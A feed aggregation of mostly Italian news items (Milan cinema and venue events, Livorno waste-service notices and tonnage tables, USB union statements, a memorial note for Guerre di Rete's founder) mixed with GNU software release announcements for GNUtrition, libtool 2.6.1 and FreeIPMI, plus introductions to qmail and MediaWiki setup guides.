L'articolo La sfida dei data center spaziali proviene da Guerre di Rete.


Quattro giornate dedicate al grande schermo con ingressi a prezzo speciale e l’arrivo di uno dei film più attesi della stagione.
Dal 15 al 18 giugno torna Cinema in Festa, l’iniziativa nazionale che consente di assistere a qualsiasi film nelle sale aderenti pagando soltanto 3,50 euro a biglietto.
Anche molti cinema di Milano e della Lombardia hanno aderito all’evento, offrendo agli spettatori la possibilità di vivere l’esperienza del cinema a un costo particolarmente vantaggioso.
Tra le pellicole più attese di questa edizione spicca Toy Story 5,
il nuovo capitolo della storica serie Disney-Pixar che riporta sul grande schermo Woody, Buzz Lightyear, Jessie e gli altri personaggi che hanno conquistato generazioni di spettatori. Il film farà il suo debutto nelle sale italiane il 18 giugno e sarà tra le principali novità disponibili negli ultimi giorni della manifestazione.
Nel nuovo episodio, i giocattoli si troveranno ad affrontare una situazione mai vista prima: l’influenza della tecnologia nella vita dei più piccoli. La vicenda ruota attorno a Lilypad, un moderno tablet che cattura immediatamente l’interesse della giovane Bonnie, mettendo in discussione l’importanza dei giocattoli tradizionali.
Cinema in Festa nasce con l’obiettivo di favorire il ritorno del pubblico nelle sale cinematografiche ed è promosso dall’intero comparto dell’industria cinematografica italiana.
Negli ultimi anni l’iniziativa ha raccolto un crescente consenso, diventando un appuntamento molto apprezzato dagli appassionati di cinema.
L’evento rappresenta un’ottima opportunità sia per recuperare i film ancora in programmazione sia per scoprire le nuove uscite previste per l’estate.
Per verificare l’elenco completo delle sale aderenti e consultare gli orari delle proiezioni,
è possibile visitare i siti ufficiali dei cinema partecipanti.
L'articolo Ritorna Cinema in Festa: film a 3,50 euro e debutta anche Toy Story 5 proviene da InfoMilano.news.

L'articolo Guida pratica per scegliere un ERP aziendale adatto ai propri processi proviene da FullPress.
Non è possibile sostituire Carola Frediani, fondatrice, anima e colonna portante di Guerre di Rete. Allo stesso tempo, sappiamo per certo che l’ultima cosa che Carola avrebbe voluto è che questo progetto terminasse.
Carola ha sempre voluto ampliare e far crescere Guerre di Rete. Non c’era nulla che le desse più soddisfazione che individuare nuovi collaboratori e collaboratrici, allargare la squadra della redazione, trasformare ciò che era nato come una newsletter personale in un progetto collettivo.
È per questo che Guerre di Rete va avanti, in memoria di Carola e d’accordo con la sua famiglia.
Guerre di Rete prosegue mantenendo inalterato il patto con il lettore. Il nostro continuerà a essere un giornalismo rigoroso, approfondito, autonomo e indipendente.
I nostri lettori e le nostre lettrici sono coloro che ci permettono di andare avanti, finanziando un progetto che quindi solo a loro vuole e deve rispondere.
Il lavoro di Carola Frediani è la nostra bussola. L’affetto e la stima che proviamo per lei è la ragione per cui vogliamo portare avanti la sua missione.
Lo faremo con tutte le nostre forze.
La redazione di Guerre di Rete
L'articolo Guerre di Rete continua, in memoria di Carola Frediani proviene da Guerre di Rete.

Milano accoglie una nuova location destinata a diventare uno dei punti di riferimento per
pranzi,aperitivi, eventi e serate all’aperto. Giovedì 11 giugno 2026 arriva infatti la
grande inaugurazione di Cascina Corten Milano, il nuovo spazio situato nella zona di Merlata Bloom,
una delle aree più dinamiche e in forte crescita della città.
Per celebrare l’apertura è stato organizzato un esclusivo Opening Party con ingresso su accredito e drink omaggio per gli ospiti che parteciperanno all’evento inaugurale.

–
Per partecipare gratuitamente basta Accreditarsi :
https://www.infomilano.news/eventi/inaugurazionecascinacorten/
–
La nuova Cascina Corten si trova in Via Pier Paolo Pasolini 3, a pochi passi dal Merlata Bloom Milano, il nuovo polo commerciale e di intrattenimento che negli ultimi anni ha trasformato completamente questa zona della città.
L’obiettivo della location è offrire un ambiente moderno immerso nel verde, perfetto per pranzi,aperitivi al tramonto, eventi aziendali, feste private, DJ set e appuntamenti estivi.
L’evento inaugurale sarà l’occasione ideale per scoprire gli spazi della nuova struttura e vivere una serata all’insegna della musica e della convivialità.
Durante la serata gli ospiti potranno partecipare a:
Una formula pensata per chi cerca nuove location a Milano dove trascorrere una serata diversa dal solito, lontano dal caos del centro ma facilmente raggiungibile.
–
Per partecipare gratuitamente basta Accreditarsi :
https://www.infomilano.news/eventi/inaugurazionecascinacorten/
–
Negli ultimi anni Milano ha visto nascere numerosi spazi dedicati agli eventi outdoor, ma la zona Merlata rappresenta una delle novità più interessanti del panorama cittadino.
La presenza di ampie aree verdi, la vicinanza alle principali arterie cittadine e il continuo sviluppo del quartiere rendono Cascina Corten una location con un enorme potenziale per ospitare eventi, aperitivi, festival e appuntamenti musicali durante tutta la stagione estiva.
Chi ama scoprire nuove location a Milano troverà in Cascina Corten uno spazio completamente nuovo, ideale per vivere l’aperitivo in un contesto rilassato e contemporaneo.
=====
CASCINA CORTEN
Via Pier Paolo Pasolini 3, Milano
L'articolo Cascina Corten apre a Milano : Giovedì 11 Giugno la grande inaugurazione proviene da InfoMilano.news.
Non potevano certamente passare inosservati agli operatori di AAMPS/Retiambiente due “big bag” in polietilene di grosse dimensioni contenenti materiale di risulta da lavorazioni edili abbandonati nelle ore notturne accanto ad un cassonetto stradale per la raccolta dei rifiuti in località Le Vaschette sul Romito a ridosso della scogliera.
L'articolo Eternit abbandonato sul Romito: intervengono gli Ispettori Ambientali proviene da Aamps Livorno.
Il nuovo assetto geopolitico mondiale ha messo a nudo una serie di problematiche che sono state trascurate troppo a lungo. In pratica, quello che per anni abbiamo visto accadere nel software, ovvero l’entusiasmo per le nuove feature che andava a coprire la necessità di rendere sicuro il loro utilizzo, si è applicato anche in mille […]
L'articolo Infrastrutture Critiche e Geopolitica: è l’Era dell’Antifragilità proviene da Securityinfo.it.





Dal 8 al 12 giugno 2026, Helsinki ospita TNC26, la principale conferenza internazionale dedicata al networking per la ricerca e l'istruzione, organizzata da GÉANT in collaborazione con CSC, il centro nazionale finlandese per le infrastrutture IT scientifiche che gestisce Funet, la rete della ricerca finlandese.
Da mesi gli operai della Solvay degli stabilimenti di Livorno e Rosignano sono alle prese con gravi problematiche per quanto riguarda la retribuzione e gli stipendi. L';azienda, dopo aver deciso di cambiare gestionale per l'elaborazione dei cedolini, ha iniziato ad pagare le retribuzioni con vistosi ammanchi di denaro. In alcune occasioni agli operai sono state corrisposte cifre più alte per poi essere sottratte nuovamente, il mese successivo, senza alcuna spiegazione tecnica e senza giustificativi precisi. Dopo il primo mese la situazione poteva e doveva essere risolta mentre invece i disagi si stanno protraendo ormai da troppo tempo.
Per questo motivo nella giornata odierna era stata indetta un'assemblea sindacale dalla RSU Solvay. Assemblea che è stata poi negata dalla dirigenza aziendale. I Lavoratori si sono presentati comunque davanti alla sede di confindustria, una delegazione fuori dall'orario di lavoro, in segno di protesta. Anche l'associazione di categoria ha deciso di sbarrare il portone.
Questo è l'tteggiamento che i padroni hanno deciso di tenere di fronte ad una legittima mobilitazione e di fronte a problematiche che hanno come unico responsabile l'azienda e non certo i lavoratori.
Serve chiarezza rispetto al pagamento degli stipendi. Una multinazionale, come la solvay, non è in grado di risolovere una situazione come questa?
Grazie alle proteste, in entrambi gli stabilimenti, la RSU è stata convocata per il 9 giugno. USB farà la sua parte affinchè si arrivi ad una soluzione che veda salvaguardati gli interessi dei lavoratori.
RSU Solvay
USB Livorno


Milano 5 Giugno 2026 – Milano riscopre il piacere del cinema condiviso sotto le stelle.
Da giugno a settembre ritorna “Social Cinema”, la rassegna itinerante ideata da Cinevan che porterà proiezioni gratuite, documentari, incontri e momenti di socialità nei quartieri della città, trasformando cortili, parchi e piazze in luoghi di incontro e partecipazione.
Un vecchio van Volkswagen attrezzato come cinema mobile attraverserà sei quartieri milanesi per raccontare, le storie di chi ogni giorno costruisce comunità: associazioni, volontari, abitanti, educatori e realtà sociali che animano il tessuto urbano spesso lontano dai riflettori.
Il progetto prenderà il via il 9 giugno dal quartiere Muggiano, nella periferia ovest della città, insieme all’associazione Cous Cous Clan. Poi il viaggio proseguirà tra il Borgo Intergenerazionale di Greco con ABCittà, il Parco Ravizza con i volontari del NAGA, i giardini condivisi di via Gattamelata con ParteciPrato, il giardino della Fondazione IBVA, fino alle case popolari MM di via Scaldasole e viale Lombardia insieme ad Arci Fiocchi.

In totale saranno organizzate 18 proiezioni gratuite in 6 quartieri cittadini, accompagnate da 6 narrazioni video partecipate e da una selezione di film scelta insieme agli abitanti: ogni tappa ospiterà tre serate gratuite di cinema all’aperto, con una programmazione pensata per coinvolgere pubblici diversi – bambini, famiglie, giovani e anziani – accompagnata da aperitivi comunitari, tavolate condivise e occasioni di incontro tra abitanti.
“Social Cinema” non sarà soltanto una rassegna cinematografica. Al centro dell’iniziativa ci sono anche sei brevi documentari originali dedicati ai territori coinvolti, narrati dalla giornalista Sara Zambotti e realizzati insieme alle associazioni partner. I video affronteranno temi cruciali per la Milano contemporanea: il diritto alla casa, le politiche migratorie, la cittadinanza attiva, la rigenerazione urbana e il valore degli spazi pubblici come luoghi di relazione.
L’obiettivo è semplice e ambizioso allo stesso tempo: usare il cinema come strumento culturale capace di creare connessioni sociali e riportare le persone negli spazi condivisi della città.
“Una comunità è un organismo che ha bisogno di essere nutrito per prosperare”, spiega Luca Cusani promotore del progetto. Ed è proprio questo il cuore di Social Cinema: costruire momenti di aggregazione autentica attraverso la cultura accessibile e gratuita.
Il progetto è realizzato da Cinevan con il contributo del Bando 57 di Fondazione di Comunità Milano, in partenariato con ABCittà, Fondazione IBVA e Parteciprato, e con la collaborazione di Arci Fiocchi, Cous Cous Clan, NAGA e MM Spa.

Programma completo su https://www.cinevan.it/social-cinema/
Per informazioni:
+39 328 104 3876
L'articolo Social Cinema: il cinema gratuito riaccende i quartieri di Milano proviene da InfoMilano.news.
GNUtrition 0.33 is now released. This marks the first release of GNUtrition since 2012, approximately 14 years ago!
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release is a complete rewrite of GNUtrition in C rather than Python 2 with a new GTK 3 interface replacing the old GTK 2 one. The Nutrient Database of Standard Reference, which stopped getting updated in 2018, was replaced with the USDA Food and Nutrition Database for Dietary Studies. With help from some test volunteers, the build and installation process was better streamlined to resolve critical issues and difficulties so that GNUtrition can be a better program overall.
Considering the time between releases, GNUtrition currently is not available on OS package repositories (as far as I am aware). If you package software for your operating system's package manager, it would be very helpful if you could start packaging GNUtrition so that it may be even more easily used by people on said systems. If you don't, you may still request to those who do to start including GNUtrition.
Thank you to everyone who tested/used GNUtrition 0.33's release candidates and provided meaningful feedback on its functionality, design, and so on. I would also like to especially thank Jason Self for providing us with the C rewrite in the first place.
More information about GNUtrition may be found on its home page at http://gnu.org/so ... tware/gnutrition/. This release can be obtained from the ftp.gnu.org server at one of the following:
ftp://ftp.gnu.o ... gnu/gnutrition/
http://ftp.gnu.or ... g/gnu/gnutrition/
https://ftp.gnu.o ... g/gnu/gnutrition/
The FTP mirror list is available at https://gnu.or ... order/ftp.html, and https://ftpmirror ... u.org/gnutrition/ will automatically redirect you to a nearby mirror.
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).
Happy hacking and calorie counting!!
Version 5.5 of GNU direvent is available for downloads. New in this version:
See the NEWS file for more details.

Informiamo i cittadini che sabato 6 giugno il Centro Ambientale Temporaneo di Via dei Cordai effettuerà apertura con orario 9:00 – 12:00.
Il servizio sarà regolarmente attivo per il conferimento delle varie tipologie di rifiuto, nel rispetto delle normative vigenti.
Ricordiamo che i quantitativi e le tipologie di rifiuti accettati saranno quelli previsti dalla tabella.
Per ulteriori informazioni: 800-031.266, info@aamps.livorno.it, facebook/instagram/APP (“AAMPS Livorno”).
L'articolo Centro Ambientale Temporaneo (CAT) 06/06/26 aperto in orario mattutino. proviene da Aamps Livorno.
| RIFIUTI URBANI TRATTATI | Aprile 2026 | TOTALE ANNO 2026 |
| Carta e cartoni | 725,55 | 2.999,70 |
| Imballaggi in vetro | 438,54 | 1.650,97 |
| Multimateriale Leggero | 669,81 | 2.620,38 |
| Legno e ingombranti | 478,01 | 1.940,22 |
| Frazione organica e compostabili | 1.388,92 | 5.559,82 |
| RAEE | 62,21 | 238,62 |
| Altre RD | 195,10 | 791,76 |
| Macerie | 98,95 | 370,49 |
| Rifiuto indifferenziato | 2.593,58 | 10.087,94 |
| Totale tonnellate | 6.650,67 | 26.259,90 |
| Efficienza % raccolta differenziata | 61,00% | 61,58% |
| Variaz. efficienza % RD su anno 2025 | -0,49% | -0,87% |
L'articolo Tonnellate di rifiuti urbani raccolti e trattati Aprile 2026 proviene da Aamps Livorno.
Un gruppo cybercriminale di lingua cinese fino a poco tempo fa concentrato prevalentemente sul mercato asiatico sta ampliando rapidamente il proprio raggio d’azione verso Europa e Africa. Secondo le analisi pubblicate da Proofpoint, il gruppo chiamato TA4922 ha aumentato sensibilmente il volume delle proprie operazioni nel corso del 2026, prendendo di mira organizzazioni nel Regno […]
L'articolo Il gruppo criminale cinese TA4922 adesso punta anche all’Europa proviene da Securityinfo.it.
Libtoolers!
The Libtool Team is pleased to announce the release of libtool 2.6.1, a beta release.
GNU Libtool hides the complexity of using shared libraries behind a
consistent, portable interface. GNU Libtool ships with GNU libltdl, which
hides the complexity of loading dynamic runtime libraries (modules)
behind a consistent, portable interface.
There have been 34 commits by 14 people in the 37 weeks since 2.6.0.
See the NEWS below for a brief summary.
Thanks to everyone who has contributed!
The following people contributed changes to this release:
Alexandre Janniaux (4)
Alexey Samsonov (1)
Anthony Mallet (1)
Arnold (1)
Dima Pasechnik (1)
Frederic Berat (1)
Ileana Dumitrescu (15)
KO Myung-Hun (4)
Kirill Makurin (1)
Mintsuki (1)
Nicolas Boulenguez (1)
Olly Betts (1)
Patrice Dumas (1)
Richard J. Mathar (1)
Ileana
[on behalf of the libtool maintainers]
==================================================================
Here is the GNU libtool home page:
https://gnu. ... g/s/libtool/
Here are the compressed sources:
https://alpha.gnu ... tool-2.6.1.tar.gz (2.1MB)
https://alpha.gnu ... tool-2.6.1.tar.xz (1.1MB)
Here are the GPG detached signatures:
https://alpha.gnu ... -2.6.1.tar.gz.sig
https://alpha.gnu ... -2.6.1.tar.xz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.o ... rg/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
File: libtool-2.6.1.tar.gz
SHA256 sum: 52264ab2fca9464dea9f6a0355d39e49b18f40468b9b6dbc3d151a0dba307a4b
SHA3-256 sum: 59826fb74043179c38a393448b92dfcdfbe9046fd3b23a7079665984f22d6688
File: libtool-2.6.1.tar.xz
SHA256 sum: 3fb21f1e99fcdd8565c9b00fb1371db457b82a0da7cba273e1617c954b0ad1ee
SHA3-256 sum: 614bc3ed43293be989ec3305dae42fc4e81234429477490734a40f6d3316560b
Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.
Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify libtool-2.6.1.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096 2021-09-23 [SC]
FA26 CA78 4BE1 8892 7F22 B99F 6570 EA01 146F 7354
uid Ileana Dumitrescu <ileanadumitrescu95@gmail.com>
uid Ileana Dumitrescu <ileanadumi95@protonmail.com>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key ileanadumitrescu95@gmail.com
gpg --recv-keys 6570EA01146F7354
wget -q -O- 'https://savannah. ... ol&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify libtool-2.6.1.tar.gz.sig
This release is based on the libtool git repository, available as
git clone https://https.git ... g/git/libtool.git
with commit 79de7bb71bc0a1167f4c4ae8bd897976a0ff2b51 tagged as v2.6.1.
For a summary of changes and contributors, see:
https://gitweb.gi ... shortlog;h=v2.6.1
or run this command from a git-cloned libtool directory:
git shortlog v2.6.0..v2.6.1
This release was bootstrapped with the following tools:
Autoconf 2.73
Automake 1.18.1
Gnulib 2026-05-12 722f67e9716bf914c18d468336c1f4f9e5cce915
NEWS
** New features:
- Pass 'resource-dir=*' flag for Clang.
- Recognise explicit shared library arguments when linking dependency
libraries to a shared library, like exists when linking a program.
- Support OpenMP with macOS clang by processing '-Xpreprocessor
-fopenmp' as one token.
** Bug fixes:
- Store cygpath file path conversions correctly for MSYS2 and MSVC.
- Fix syntax error in LT_PROG_OBJC and LT_PROG_OBJCXX.
- Separate Objective C and C++ cache check for proper tagging support.
- Fix in darwin to support values with spaces.
- Limit the length of DLL name to 8.3 correctly to avoid corrupting a
generated DLL on OS/2.
- Remove unused variable on OS/2, which could cause issues with static
library generation if defined.
- Recognise more static linking options for Clang.
- Fix emscripten CXX postdeps using non-PIC sysroot.
- Avoid deprecated option '-o' with MSVC compilers and replace with '-Fe'.
- Avoid overlinking of dependency libraries on ELF systems.
- Ensure old libraries are not archived.
** Changes in supported systems or compilers:
- Add support for SlimCC compiler.
- Add support for *-ironclad-gnu.
Enjoy!

| RIFIUTI URBANI TRATTATI | Marzo 2026 | TOTALE ANNO 2026 |
| Carta e cartoni | 746,30 | 2.274,15 |
| Imballaggi in vetro | 416,77 | 1.223,03 |
| Multimateriale Leggero | 696,24 | 1.950,57 |
| Legno e ingombranti | 507,91 | 1.331,09 |
| Frazione organica e compostabili | 1.483,17 | 4.168,26 |
| RAEE | 59,65 | 176,41 |
| Altre RD | 207,32 | 601,03 |
| Macerie | 109,62 | 271,54 |
| Rifiuto indifferenziato | 2.494,35 | 7.499,96 |
| Totale tonnellate | 6.721,32 | 19.496,04 |
| Efficienza % raccolta differenziata | 62,89% | 61,53% |
| Variaz. efficienza % RD su anno 2025 | +0,6% | -1,37% |
L'articolo Tonnellate di rifiuti urbani raccolti e trattati Marzo 2026 proviene da Aamps Livorno.
USB esprime piena solidarietà alle decine di attivisti, studenti, lavoratrici e lavoratori raggiunti da denunce in relazione alle mobilitazioni che negli ultimi anni hanno attraversato Pisa contro la guerra, il riarmo e in sostegno del popolo palestinese.
Le oltre 60 denunce rappresentano un fatto grave che si inserisce in un contesto nazionale caratterizzato da un progressivo irrigidimento delle politiche di ordine pubblico e da una crescente limitazione degli spazi di agibilità democratica e di conflitto sociale. A Pisa, città che è stata protagonista di importanti mobilitazioni contro la guerra e il genocidio del popolo palestinese, l'accanimento repressivo colpisce proprio coloro che hanno animato quelle piazze, dalle iniziative nelle università alle manifestazioni cittadine, fino ai grandi cortei che hanno accompagnato gli scioperi generali promossi da USB il 22 settembre e il 3 ottobre.
E’ stato un autunno incredibile, milioni di persone in piazza in tutta Italia ma ci sono voluti due anni di genocidio in diretta perché questo avvenisse. Attorno agli scioperi generali indetti da USB e dal sindacalismo conflittuale si è sviluppato un movimento di massa che ha unito lavoratori, studenti, precari e realtà sociali sotto la parola d'ordine chiara: "Blocchiamo tutto". Migliaia di persone sono scese in piazza per denunciare il genocidio del popolo palestinese, opporsi alle politiche di guerra, al riarmo e alla complicità del governo italiano con l'escalation militare israeliana. Quelle giornate hanno rappresentato un momento alto di partecipazione popolare e di ricomposizione sociale, dimostrando che esiste nel Paese una larga opposizione alle logiche della guerra e dell'economia di guerra.
È proprio quella forza espressa nelle piazze a essere oggi oggetto di un tentativo di intimidazione. Dietro questa operazione non vediamo soltanto la volontà di perseguire singoli episodi, ma un disegno più ampio volto a colpire chi organizza conflitto sociale, solidarietà internazionale e opposizione alle politiche governative. In una fase segnata dall'aumento delle spese militari, dal peggioramento delle condizioni di vita e di lavoro e dall'inasprirsi dei conflitti internazionali, la risposta delle istituzioni sembra essere sempre più quella della repressione.
Le immagini delle cariche contro gli studenti che manifestavano pacificamente per chiedere la fine del massacro del popolo palestinese restano impresse nella memoria della nostra città. Oggi, a quelle violenze, si aggiunge una nuova offensiva che passa attraverso denunce e procedimenti giudiziari rivolti a chi ha esercitato il diritto di manifestare.
USB ribadisce che la solidarietà al popolo palestinese, il rifiuto della guerra e delle politiche di riarmo, la difesa dei diritti sociali e democratici non possono essere criminalizzati. Le mobilitazioni che hanno attraversato Pisa e il Paese in questi anni hanno rappresentato una risposta concreta alla normalizzazione della guerra e all'indifferenza verso il dramma vissuto dal popolo palestinese. Sono state piazze partecipate, popolari e determinate, che hanno rimesso al centro il valore dell'internazionalismo e della solidarietà tra i popoli, che hanno visto dopo tanti anni migliaia di lavoratrici e lavoratori aderire a uno sciopero politico e scendere in piazza.
Per questo riteniamo fondamentale costruire la più ampia solidarietà nei confronti delle persone colpite dalle denunce, sostenendole sul piano politico e legale. Nelle prossime settimane promuoveremo momenti pubblici di confronto e iniziative di sostegno, coinvolgendo avvocati, associazioni, realtà sociali e sindacali, con l'obiettivo di contrastare l'ondata repressiva e difendere gli spazi di partecipazione democratica.
Di fronte a questo tentativo di intimidazione, la risposta deve essere collettiva. Le decine di migliaia di persone che hanno riempito le piazze dell'autunno contro il genocidio del popolo palestinese e contro la guerra dimostrano che non si può reprimere un movimento che affonda le proprie radici nella giustizia sociale, nella pace e nella solidarietà internazionale.
In quelle piazze c'eravamo tutti. E continueremo ad esserci.
Unione Sindacale di Base - Federazione di Pisa

Stamattina a Rosignano Solvay un operaio di trent'anni è morto. Caduto dal tetto di un'azienda in via degli Artigiani, dove stava sostituendo pannelli. Il tetto ha ceduto. Era il suo primo giorno di lavoro in quella ditta. Trent'anni. Primo giorno di lavoro. Ucciso sul lavoro.
Ieri, ad Amendolara, in Calabria, sulla Statale 106, quattro braccianti di origine afghana — Waseem, Amin, Ullah e Safi — sono morti carbonizzati all'interno di un'auto, in un'area di servizio. Lavoratori sfruttati, stretti nella morsa del caporalato che da anni controlla la Piana di Sibari. Erano in Italia con regolare permesso di soggiorno da diversi anni. Si trattava di persone, lavoratori, non merce.
Cinque morti in due giorni. E siamo solo al 4 giugno.
Questo è il capitalismo italiano. Questo è il mercato del lavoro che ci vogliono far accettare.
Non si tratta di fatalità, di sfortuna, di circostanze accidentali. Si tratta di un sistema che deliberatamente comprime il costo del lavoro fino all'osso, che trasforma i lavoratori in corpi usa e getta, che scarica sui più deboli, i precari, i migranti, chi non può permettersi di dire no, il rischio di morire per un salario quasi sempre sotto la soglia di povertà. Turni massacranti, paghe misere o nulle, schiavismo. E quando il corpo cede o il tetto crolla, li abbandonano sul ciglio della strada come oggetti consumati.
Il caporalato non è un'anomalia del Sud. La precarietà mortale non è un'anomalia del Nord. Sono le due facce dello stesso sistema: quello che antepone il profitto alla vita, quello che usa la ricattabilità economica come arma di controllo sui lavoratori.
USB rivendica con forza quello che questo sistema nega ogni giorno: il lavoro deve essere sicuro, sempre, per tutti. Questo significa rispetto rigoroso delle norme antinfortunistiche, formazione obbligatoria prima di mettere piede su un cantiere, dispositivi di protezione reali e funzionanti, rappresentanti dei lavoratori per la sicurezza con poteri effettivi, compreso il blocco immediato delle lavorazioni a rischio. E significa responsabilità penale certa per chi uccide risparmiando sulla sicurezza.
C'è poi il nodo legato ai salari che devono essere adeguati a una vita dignitosa. Perché la povertà salariale e la precarietà contrattuale non sono questioni separate dalla sicurezza: sono la stessa questione. Chi è ricattabile sul contratto è ricattabile anche sulla propria incolumità. Chi non può permettersi di rifiutare un lavoro pericoloso, un turno in più, un'ora sul tetto senza protezioni, è un lavoratore che il sistema espone deliberatamente alla morte. La fame è una forma di coercizione e il caporalato ne è l'espressione più brutale.
Sicurezza, stabilità e dignità sul lavoro sono la scelta politica che pretendiamo da chi governa. È inutile che la politica si batta il petto davanti alle bare: dietro ogni morte sul lavoro c'è la sua firma.
USB Toscana esprime il proprio cordoglio alle famiglie di tutti questi lavoratori. Trasformiamo il dolore in rabbia di classe e in lotta organizzata.






In mezzo alla gente, ma con discrezione ed efficienza. Gli operatori di AAMPS/Retiambiente hanno contribuito alla riuscita dell’evento Straborgo che da venerdì 29 maggio a sabato 1 giugno ha visto migliaia di persone, tra cittadini e turisti, affollare le strade del quartiere. Una presenza continuativa per garantire la pulizia di Piazza Mazzini e delle strade limitrofe e realizzare la raccolta dei rifiuti sia con la vuotatura dei contenitori stradali sia con la raccolta dei materiali differenziati prodotti con quantitativi ingenti dagli esercenti della zona.
“Questa tipologia di manifestazione – commenta Aldo Iacomelli, Amministratore Unico AAMPS/Retiambiente – risulta per noi sempre particolarmente impegnativa soprattutto nel periodo estivo che prevede un’articolazione complessa dei nostri servizi di raccolta e spazzamento. Dobbiamo operare h24 e, allo stesso tempo, districarci tra la folla garantendo sempre le opportune condizioni di sicurezza per i nostri lavoratori e i cittadini. Siamo particolarmente soddisfatti nell’essere riusciti a dare il nostro contributo. Ho il piacere di sottolineare – conclude Iacomelli – la cooperazione che abbiamo riscontrato da parte degli organizzatori, degli abitanti del quartiere e degli esercenti che si sono prodigati per rispettare le regole straordinarie di conferimento dei rifiuti differenziati”.
“Lo dico da sempre – afferma Luca Salvetti, Sindaco di Livorno. AAMPS/Retiambiente è un’azienda che funziona egregiamente nell’erogazione dei servizi resi alla cittadinanza e questi eventi ne sono la riprova. Senza i puntuali servizi di spazzamento e raccolta dei rifiuti non saremmo qui a parlare del successo di Straborgo. Ringrazio i lavoratori per il consueto impegno profuso, gli abitanti del quartiere per la disponibilità concessa e gli esercenti per avere collaborato al meglio delle rispettive possibilità. Ora sotto con le altre kermesse in programma per la lunga stagione estiva”.
L'articolo “Straborgo”: servizi di pulizia e raccolta rifiuti efficaci e puntuali proviene da Aamps Livorno.
L'articolo Addio Carola proviene da Guerre di Rete.
Quotando la definizione di D. J. Bernstein
qmail è un mail transfer agent semplice, sicuro ed affidabile. è stato progettato per dei server UNIX connessi alla rete internet
E' possibile reperire una introduzione più che comprensibile su come funziona un mail server in questa pagina. Anche la "qmail newbie's guide to relaying" di Chris Johnson (copia locale... è destino che tutto quello che riguarda qmail vada piano piano sparendo) è molto chiara e la sua lettura è fondamentale all'inizio.
Lo scopo di questa piccola guida NON è insegnare come funziona un server di posta, anche se alla fine si spera che uno che l'abbia seguita riesca ad avere un server funzionante. Questi appunti servono principalmente a ricordare i passi principali da seguire per avere una installazione veloce di qmail e di alcuni software correlati. Ho deciso di scriverla a causa della mancanza di ogni aggiornamento della documentazione riguardante le "distribuzioni" di qmail che mi erano familiari, nella speranza che ciò possa essere di aiuto anche a qualcun altro. Ovviamente il divertimento è stato una componente decisiva.
Pertanto, per conoscere in dettaglio come funziona un mail server, sei invitato a leggere con cura almeno i riferimenti che menzionerò in ogni pagina.
In secondo luogo, NON sono io il responsabile di quello che fai con il tuo server ;-). Usa la mia guida a tuo rischio.
Infine, i commenti, le critiche e i suggerimenti sono sempre benvenuti! :-)
Questa guida è stata scritta senza una particolare distribuzione Linux in mente. L'ho testata su due miei server di posta virtuali basati su Slackware, sia a 64 che a 32 bit, e diverse persone là fuori confermano che essa funziona nelle altre distribuzioni Linux più comuni. La compilazione dei miei pacchetti è stata testata anche su piattaforme FreeBSD, OpenBSD, NetBSD.
Se vale la definizione data da Bernstein probabilmente lo è. Tuttavia, a mio modo di vedere, un toaster dovrebbe essere una cosa alla Bill Shupp o alla qmailtoaster, che viene rilasciata insieme a tutti i pacchetti necessari, diversamente da qui. Poichè preferisco lasciare che il visitatore controlli da sè l'esistenza delle ultime versioni dei vari software, direi che questa "cosa" non dovrebbe essere classificata come un toaster. Piuttosto la chiamerei semplicemente "Roberto's qmail notes". Per la verità, sto inserendo qui un paragrafo sul toaster giusto per soddisfare i motori di ricerca, dato che molta gente arriva qui cercando un toaster per qmail.. :-) e ora che ho scritto la parola toaster 5 o 6 volte possiamo veramente iniziare... :-))
Questi appunti sono stati scritti in inglese e poi tradotti in italiano alla velocità della luce. Si vede, vero? Rileggendo ora, trovo degli strafalcioni e delle traduzioni letterali alla "Google translate"!. Me ne scuso, ma non ho sempre il tempo di fare le cose nel modo migliore..
Roberto's qmail notes is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
A test release of GNUtrition, 0.33.0rc5, is now available.
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release fixes bugs from 0.33.0rc1-rc4, removes inaccurate algorithm constants, removes additional unnecessary dependencies, improves reliability/usability on non-GNU systems, among other general improvements and bug fixes. Version 0.33.0 (the first ftp.gnu.org release of GNUtrition since 2012) is expected to be released by June 5th. Any and all testing for the upcoming release will be greatly appreciated. Please use the bug-gnutrition and help-gnutrition mailing lists for your bug reports and/or other questions.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).
Il CD e CS hanno deciso la data per l’annuale Assemblea Generale Ordinaria dei Soci, con l’esposizione di quanto è accaduto nell’anno passato e nei mesi di quello in corso.
L’AGO 2026 si terrà in data 21/06/2026 alle ore 09:00, presso il Circolo ARCI a Stagno, via Curiel, 21.
o Support new "altbridging" workaround in ipmi-sensors.
o Fix exploitable buffer overflows in the following ipmi-oem
commands:
- ipmi-oem dell get-active-directory-config
- ipmi-oem fujitsu get-sel-entry-long-text
https://ftp.gnu.o ... pmi-1.6.18.tar.gz
Mediawiki offre la possibilità di inserire formule Tex nelle nostre pagine creando dinamicamente immagini PNG per noi..
Questa pagina vuole richiamare i pacchetti e i principali passi da seguire per far funzionare Tex con MediaWiki in una macchina Slackware. Alla fine presenterò alcune problematiche nell'installzione.
